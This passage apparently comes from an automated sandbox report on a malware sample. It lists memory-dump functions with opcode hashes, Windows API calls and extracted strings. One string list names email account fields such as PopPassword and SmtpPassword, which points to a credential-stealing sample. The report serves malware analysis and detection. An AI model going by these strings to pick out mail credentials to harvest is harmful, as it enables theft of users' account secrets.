                                                                            • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                            • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                                            • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                            • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                                            APIs
                                                                            • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                            • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                                                            • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                            • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                                                            APIs
                                                                            • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                            • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                                                            • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                            • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                            • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                            • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                            • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                            • VariantInit.OLEAUT32(?), ref: 00404414
                                                                            • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                            • VariantInit.OLEAUT32(?), ref: 00404431
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                            • String ID:
                                                                            • API String ID: 1312198159-0
                                                                            • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                            • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                            • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                            • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                            • API String ID: 0-2111798378
                                                                            • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                            • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                            • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                            • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                            • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                            • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                            • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64